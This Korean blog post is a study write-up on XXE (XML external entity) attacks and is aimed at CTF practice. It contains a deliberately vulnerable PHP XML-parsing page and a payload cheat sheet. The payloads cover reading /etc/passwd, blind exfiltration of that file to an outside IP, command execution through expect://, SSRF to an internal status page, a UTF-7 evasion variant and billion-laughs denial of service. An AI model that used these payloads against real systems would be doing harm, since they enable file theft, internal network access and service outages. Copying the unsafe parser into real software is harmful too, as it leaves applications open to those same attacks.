Web security
WEB - XXE
진열님
2019. 8. 31. 21:32
공부하다가 XXE에 대해서 자세히 정리를 해보려고한다.
맨날 CTF 보면서 CHEET SHEET 만 보다보니 한번 구현을 해보는게 좋겠다 생각해서 작성해본다.
일단 XML Parser 기능이 있는 함수는 PHP에서 크게 input 을 파일명으로 받느냐 텍스트로 받느냐 2가지이다.
$변수 = simplexml_load_file(파일 지정);
$변수 = simplexml_load_string(텍스트);
아래는 공격코드 예시이며 현미니님 블로그에서 소스코드 참조하였으며 오류 생기길래 조금 수정하였다.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
<html>
<body>
<?php
if(isset($_POST['xml'])){
$xml = $_POST['xml'];
if ($xml){
echo "input length : ".strlen($_POST['xml']);
echo '<br>';
$doc = "";
$doc = simplexml_load_string($xml);
}
}
?>
<h1> XML Parser</h1>
<textarea name='xml' rows=12 cols=100></textarea>
<br>
<input type=submit size=55>
<br>
<? echo $doc->testing;?>
</form>
</body>
</html>
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4ftext-decoration:none">Colored by Color Scripter
|
공격 코드 예시.
|
1
2
3
4
5
|
<!DOCTYPE root
[
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<test><testing>&foo;</testing></test>
|
XXE 공격관점은 여러가지가 있다.
- LFI(Local File Inlcude)
|
1
2
3
4
|
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
|
- Blind LFI
|
1
2
3
4
5
|
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "http://192.168.0.12/log?%xxe;">]><foo>&blind;</foo>
|
- RCE(Remote Code Excution)
|
1
2
3
4
5
6
7
|
[ run "uname" command]
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://uname" >]>
<creds>
<user>&xxe;</user>
</creds>
|
- SSRF(Server Side Request Forgery)
|
1
2
3
4
|
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://internal_domain/server-status">]><foo>&xxe;</foo>
|
- UTF-7
|
1
2
3
4
|
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
- DOS
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
[ Local payload ]
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
[ Remote payload ]
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>
|
출처 & 좋은자료
https://hyunmini.tistory.com/66